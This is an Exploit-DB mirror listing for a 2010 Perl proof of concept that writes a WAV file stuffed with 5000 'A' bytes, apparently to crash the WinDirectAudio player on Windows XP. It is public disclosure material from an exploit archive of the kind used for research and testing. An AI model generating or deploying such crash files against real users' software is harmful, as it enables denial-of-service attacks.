exploit-db-mirror/exploits/windows/dos/12687.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
407 B
Perl
Executable file

#/usr/bin/perl
#Title: WinDirectAudio (.WAV) PoC
#[+]Date : May 21, 2010
#[+]version : v1.0
#[+]Author : ahwak2000
#[+]Contact : z.u5[at]hotmail.com
#[+]Geetz [2] : germaya_x
#[+]tested on : windows xp sp2&sp3 EN
#########################################
my $junk = "\x41" x 5000;
open(myfile,'>> ahwak2000.wav');
print myfile $junk."\r\n";
print "\nEvil WAV file created successfully.";